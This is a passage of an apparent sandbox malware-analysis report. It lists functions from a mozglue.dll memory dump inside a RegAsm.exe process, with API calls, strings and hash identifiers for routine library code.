                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Process__acrt_iob_func$CurrentTerminatefputcfputs
                                                                            • String ID:
                                                                            • API String ID: 2787204188-0
                                                                            • Opcode ID: f26b9706b7d01ac24e59bcc73bd739ac8161575e4a751243f20feeb98da804e2
                                                                            • Instruction ID: 9d300804ed67bedd48821102e6da071106251510fa49828224085e15a2096ba1
                                                                            • Opcode Fuzzy Hash: f26b9706b7d01ac24e59bcc73bd739ac8161575e4a751243f20feeb98da804e2
                                                                            • Instruction Fuzzy Hash: 66F01275A002087FDB00AB94DC85DAB377DDB46628F040024FD0857741E636BD2586FB
                                                                            Function 6CC82050 Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC8205B
                                                                            • AcquireSRWLockExclusive.KERNEL32(?,?,?,00000000,?,6CC8201B,?,?,?,?,?,?,?,6CC81F8F,?,?), ref: 6CC82064
                                                                            • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8208E
                                                                            • free.MOZGLUE(?,?,?,00000000,?,6CC8201B,?,?,?,?,?,?,?,6CC81F8F,?,?), ref: 6CC820A3
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                            • String ID:
                                                                            • API String ID: 2047719359-0
                                                                            • Opcode ID: 1fd8aa61f2fb3ff2a5a6ef165a275de8574be35f5b55cdd5c98bd3a212b255bd
                                                                            • Instruction ID: a7ba363ecef7fd4b7c1b29ec385ed93362742bc669c7128d3501e902d6065a11
                                                                            • Opcode Fuzzy Hash: 1fd8aa61f2fb3ff2a5a6ef165a275de8574be35f5b55cdd5c98bd3a212b255bd
                                                                            • Instruction Fuzzy Hash: E7F0B4B1201A109BC7118F16D89C75BBBF9EF86328F10012AF50687710DBB5B806CB99
                                                                            Function 6CC820B0 Relevance: 6.0, APIs: 4, Instructions: 28threadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 6CC820B7
                                                                            • AcquireSRWLockExclusive.KERNEL32(00000000,?,6CC6FBD1), ref: 6CC820C0
                                                                            • ReleaseSRWLockExclusive.KERNEL32(00000000,?,6CC6FBD1), ref: 6CC820DA
                                                                            • free.MOZGLUE(00000000,?,6CC6FBD1), ref: 6CC820F1
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
                                                                            • String ID:
                                                                            • API String ID: 2047719359-0
                                                                            • Opcode ID: 7d1174ac2bf61cefeba09c69ac75a7664a074a6926acb5316bd4a1344ea7b325
                                                                            • Instruction ID: 76e149e102248059f2c16f70d5a8d1039b48b1e54a8c2708622b9a547cfe41a2
                                                                            • Opcode Fuzzy Hash: 7d1174ac2bf61cefeba09c69ac75a7664a074a6926acb5316bd4a1344ea7b325
                                                                            • Instruction Fuzzy Hash: 1CE0E5756016148BC6209F65985C54FBBF9FF86318B10022AF446C3B00E775B94686D9
                                                                            Function 6CC885B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • moz_xmalloc.MOZGLUE(00000028,?,?,?), ref: 6CC885D3
                                                                              • Part of subcall function 6CC4CA10: malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                            • ?_Xlength_error@std@@YAXPBD@Z.MSVCP140(map/set<T> too long,?,?,?), ref: 6CC88725
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Xlength_error@std@@mallocmoz_xmalloc
                                                                            • String ID: map/set<T> too long
                                                                            • API String ID: 3720097785-1285458680
                                                                            • Opcode ID: a2ee0e7a6e24b434dee6806558f80573ce5ee64091a7b4235445ab55b9e9c6fa
                                                                            • Instruction ID: 2140abc75b77bfd605806b1b4853986fe4d67bedb3431fac5c25acb84d06685e
                                                                            • Opcode Fuzzy Hash: a2ee0e7a6e24b434dee6806558f80573ce5ee64091a7b4235445ab55b9e9c6fa
                                                                            • Instruction Fuzzy Hash: 285164B4602641CFD701CF18C184A5ABBF1BF4A318F18C29AD8595BB66E335E885CF92
                                                                            Function 6CC3BD40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 115COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(00000000,?,?,?,?), ref: 6CC3BDEB
                                                                            • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC3BE8F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: String$Builder@2@@Converter@double_conversion@@Double$CreateDecimalHandleRepresentation@SpecialValues@
                                                                            • String ID: 0
                                                                            • API String ID: 2811501404-4108050209
                                                                            • Opcode ID: 9fd72e3f04b93bdfc3143c00918b56ce7838e11e1df89ec044972582474df977
                                                                            • Instruction ID: dc0f8432bd8d73194d30666967e99beefccc4b790f38438710aa6e3bf2a419d4
                                                                            • Opcode Fuzzy Hash: 9fd72e3f04b93bdfc3143c00918b56ce7838e11e1df89ec044972582474df977
                                                                            • Instruction Fuzzy Hash: E541D271908B55CFC301CF39D4A1A9BB7F4BF8A348F006A5DF989A7651E730D9498B82
                                                                            Function 6CC39A20 Relevance: 5.3, APIs: 4, Instructions: 338COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC39B2C
                                                                            • memcpy.VCRUNTIME140(6CC399CF,00000000,?), ref: 6CC39BB6
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC39BF8
                                                                            • memcpy.VCRUNTIME140(?,?,?), ref: 6CC39DE4
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: c48e7ef9f5be8a2ce3c6dcfca55e81f4c9f0b68fc02e92201b7a6872d1ae40a9
                                                                            • Instruction ID: cce6f19c9378b63bca89e7c8d64454aa60d858121a9bbb3471b6fef0b2c2216b
                                                                            • Opcode Fuzzy Hash: c48e7ef9f5be8a2ce3c6dcfca55e81f4c9f0b68fc02e92201b7a6872d1ae40a9
                                                                            • Instruction Fuzzy Hash: 6CD16F71A0021ADFCB14CF69D881AAEB7F2FF88314F184529E94AA7750E731ED55CB90
                                                                            Function 6CC80A70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 6CC437F0: ?ensureCapacitySlow@ProfilingStack@baseprofiler@mozilla@@AAEXXZ.MOZGLUE(?,?,?,?,6CC9145F,baseprofiler::AddMarkerToBuffer,00000000,?,00000039,00000000), ref: 6CC4380A
                                                                              • Part of subcall function 6CC78DC0: moz_xmalloc.MOZGLUE(00000038,?,?,00000000,?,6CC906E6,?,?,00000008,?,?,?,?,?,?,?), ref: 6CC78DCC
                                                                              • Part of subcall function 6CC80B60: moz_xmalloc.MOZGLUE(00000080,?,?,?,?,6CC8138F,?,?,?), ref: 6CC80B80
                                                                            • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,00000001,?,?,6CC8138F,?,?,?), ref: 6CC80B27
                                                                            • free.MOZGLUE(?,?,?,?,?,6CC8138F,?,?,?), ref: 6CC80B3F
                                                                            Strings
                                                                            • baseprofiler::profiler_capture_backtrace, xrefs: 6CC80AB5
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: moz_xmalloc$?ensure?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CapacityCaptureChunkedOptions@2@@ProfileProfilingSlow@StackStack@baseprofiler@mozilla@@free
                                                                            • String ID: baseprofiler::profiler_capture_backtrace
                                                                            • API String ID: 3592261714-147032715
                                                                            • Opcode ID: 19df5f3ff4442524f0e4de9dc21ddba26eef5d5a722268c901b5c6c07c8fab0a
                                                                            • Instruction ID: 01a62c254900b9b74881f636af83745b668563957600ac2ca83bc1fca52e38d4
                                                                            • Opcode Fuzzy Hash: 19df5f3ff4442524f0e4de9dc21ddba26eef5d5a722268c901b5c6c07c8fab0a
                                                                            • Instruction Fuzzy Hash: 2C21ADB8B022459BDB04DF98C890ABBB7B5AF8570CF14442DD805ABB41EB74A945CBA1
                                                                            Function 6CC3F180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • calloc.MOZGLUE(?,?), ref: 6CC3F19B
                                                                              • Part of subcall function 6CC5D850: EnterCriticalSection.KERNEL32(?), ref: 6CC5D904
                                                                              • Part of subcall function 6CC5D850: LeaveCriticalSection.KERNEL32(?), ref: 6CC5D971
                                                                              • Part of subcall function 6CC5D850: memset.VCRUNTIME140(?,00000000,?), ref: 6CC5D97B
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC3F209
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeavecallocmemsetmozalloc_abort
                                                                            • String ID: d
                                                                            • API String ID: 3775194440-2564639436
                                                                            • Opcode ID: df8e5fdf48507bb3c2e8b4c94b5a76040842cdc182b91fb6aa490ecaee76c7dc
                                                                            • Instruction ID: de78870f37434729b43fe0949190a74e1900eaee826bdaddedab6d7d3787a296
                                                                            • Opcode Fuzzy Hash: df8e5fdf48507bb3c2e8b4c94b5a76040842cdc182b91fb6aa490ecaee76c7dc
                                                                            • Instruction Fuzzy Hash: E4116A32A0564A8ADB008F58A9611EEB379DF46308B01666DDC09AB612FB319DC4C384
                                                                            Function 6CC4CA10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • malloc.MOZGLUE(?), ref: 6CC4CA26
                                                                              • Part of subcall function 6CC4CAB0: EnterCriticalSection.KERNEL32(?), ref: 6CC4CB49
                                                                              • Part of subcall function 6CC4CAB0: LeaveCriticalSection.KERNEL32(?), ref: 6CC4CBB6
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC4CAA2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalSection$EnterLeavemallocmozalloc_abort
                                                                            • String ID: d
                                                                            • API String ID: 3517139297-2564639436
                                                                            • Opcode ID: 9027f9a66e653f80fd9b8a4b6be042fb1ae24386a03f8acab6eef999a1b928d8
                                                                            • Instruction ID: 1e6f71fb730b43117c68267fb6650b283ab3549e47eb6c48c4185cb8c4394ddc
                                                                            • Opcode Fuzzy Hash: 9027f9a66e653f80fd9b8a4b6be042fb1ae24386a03f8acab6eef999a1b928d8
                                                                            • Instruction Fuzzy Hash: D111E122E04A8897DB01DBACD8540FEB774EF96708B45D329DC45A7622FB30A9C8C380
                                                                            Function 6CC73CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC73D19
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC73D6C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: _errnomozalloc_abort
                                                                            • String ID: d
                                                                            • API String ID: 3471241338-2564639436
                                                                            • Opcode ID: 416bca0af1ac61ca75d065cc2e30dede65d3ea21d00a79466742252f954214e0
                                                                            • Instruction ID: 59cc09f05beffdbb9a0374653c439a6db4443a2522b4601e42e9718ab6cda2e4
                                                                            • Opcode Fuzzy Hash: 416bca0af1ac61ca75d065cc2e30dede65d3ea21d00a79466742252f954214e0
                                                                            • Instruction Fuzzy Hash: 6711E335E14688DBDB109BADD9184EDB775EFA6318B48835DEC459B602FB30A9C4C3A0
                                                                            Function 6CC51A50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • realloc.MOZGLUE(?,?), ref: 6CC51A6B
                                                                              • Part of subcall function 6CC51AF0: EnterCriticalSection.KERNEL32(?), ref: 6CC51C36
                                                                            • mozalloc_abort.MOZGLUE(?), ref: 6CC51AE7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CriticalEnterSectionmozalloc_abortrealloc
                                                                            • String ID: d
                                                                            • API String ID: 2670432147-2564639436
                                                                            • Opcode ID: 1b9ab47f90715433fc9134184ad3c4b297e3ea17820c881078ca5aab97218fc7
                                                                            • Instruction ID: 086a03ee7bc2d264eb39d3cf788fd956dcbc2664334e350ae224a1eab388a418
                                                                            • Opcode Fuzzy Hash: 1b9ab47f90715433fc9134184ad3c4b297e3ea17820c881078ca5aab97218fc7
                                                                            • Instruction Fuzzy Hash: F011E026E0068897DB058FACD8184EEB779EF95708F848619ED466B612FB30A9D4C390
                                                                            Function 6CC44730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6CC444B2,6CCBE21C,6CCBF7F8), ref: 6CC4473E
                                                                            • GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6CC4474A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: AddressHandleModuleProc
                                                                            • String ID: GetNtLoaderAPI
                                                                            • API String ID: 1646373207-1628273567
                                                                            • Opcode ID: 9739b3c3b9c34c6b8508ae37254be2f2f2c8b9250847a395cb2819cd14a673ca
                                                                            • Instruction ID: 0d0b0325f667d34a19ef1581cd932b4c2e2827235047b24edfb6c83d397035c1
                                                                            • Opcode Fuzzy Hash: 9739b3c3b9c34c6b8508ae37254be2f2f2c8b9250847a395cb2819cd14a673ca
                                                                            • Instruction Fuzzy Hash: 7801B1793002549FDF049FAAC88461D7BF9FB8B311B158069E905C7310EB74E802CFA6
                                                                            Function 6CC96DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6CC96E22
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC96E3F
                                                                            Strings
                                                                            • MOZ_DISABLE_WALKTHESTACK, xrefs: 6CC96E1D
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footergetenv
                                                                            • String ID: MOZ_DISABLE_WALKTHESTACK
                                                                            • API String ID: 1472356752-1153589363
                                                                            • Opcode ID: 4907150013b7fc4b00baad695dcff81ef010fc59abd9fee6b10eeedbb58e756f
                                                                            • Instruction ID: a4f688afb900f977fe161ac2993a8c0edd2871542622187077287f70f40ca24e
                                                                            • Opcode Fuzzy Hash: 4907150013b7fc4b00baad695dcff81ef010fc59abd9fee6b10eeedbb58e756f
                                                                            • Instruction Fuzzy Hash: E5F02E3C208642CFDA008BECC990A823372A793218F0401A5CC4086FA1F770E906CAEB
                                                                            Function 6CC49E70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 6CC49EEF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: Infinity$NaN
                                                                            • API String ID: 1385522511-4285296124
                                                                            • Opcode ID: 993fb1a65b0747ff0fc3f787f5c7391251036d69caf5bad3438122cd62058254
                                                                            • Instruction ID: efc1bf6c3d9d8937db2fadcef62aa9df98f14f5c9ed646079593f7db12da6dbc
                                                                            • Opcode Fuzzy Hash: 993fb1a65b0747ff0fc3f787f5c7391251036d69caf5bad3438122cd62058254
                                                                            • Instruction Fuzzy Hash: EDF0497D640641CEDB008FF9EA4AB923371B787319F208A99C6041BB40F7B56646CB8A
                                                                            Function 6CC95900 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • SetEnvironmentVariableW.KERNEL32(MOZ_SKELETON_UI_RESTARTING,6CCB51C8), ref: 6CC9591A
                                                                            • CloseHandle.KERNEL32(FFFFFFFF), ref: 6CC9592B
                                                                            Strings
                                                                            • MOZ_SKELETON_UI_RESTARTING, xrefs: 6CC95915
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: CloseEnvironmentHandleVariable
                                                                            • String ID: MOZ_SKELETON_UI_RESTARTING
                                                                            • API String ID: 297244470-335682676
                                                                            • Opcode ID: a336fefcc519144e93864fa602226c08b3fa056ca98327de2443af83924f0bce
                                                                            • Instruction ID: 339ea782cf287c118b4153d75acd24f5c31eb027c6ee305781162c1ac8bf9d22
                                                                            • Opcode Fuzzy Hash: a336fefcc519144e93864fa602226c08b3fa056ca98327de2443af83924f0bce
                                                                            • Instruction Fuzzy Hash: BBE04830205240BBEB004BE8C5487457FF89B1772AF144644F569D7ED1D3B598418795
                                                                            Function 6CC4BED0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15librarythreadCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • DisableThreadLibraryCalls.KERNEL32(?), ref: 6CC4BEE3
                                                                            • LoadLibraryExW.KERNEL32(cryptbase.dll,00000000,00000800), ref: 6CC4BEF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2475276160.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                            • Associated: 00000002.00000002.2475260144.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475578054.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475650854.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2475681095.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_6cc30000_RegAsm.jbxd
                                                                            Similarity
                                                                            • API ID: Library$CallsDisableLoadThread
                                                                            • String ID: cryptbase.dll
                                                                            • API String ID: 4137859361-1262567842
                                                                            • Opcode ID: d32b1f7f5b01e521b10a2b80484d80bbdc039c1c6f88ec9ea0f730d71fcd3e61
                                                                            • Instruction ID: 011b58f92c8a1e79a370ef0226780a45d1fec940691ca01229a66f85911a1f9a
                                                                            • Opcode Fuzzy Hash: d32b1f7f5b01e521b10a2b80484d80bbdc039c1c6f88ec9ea0f730d71fcd3e61
                                                                            • Instruction Fuzzy Hash: D0D022322C4A48EBCB00ABE08C2AF2D3BB8A712325F10C020F30594CA1E7B0A410CF98
                                                                            Function 6CC350E0 Relevance: 5.2, APIs: 4, Instructions: 213COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memcpy.VCRUNTIME140(036477E8,?,?,?,?,?,?,?,6CC34E9C,?,?,?,?,?), ref: 6CC3510A
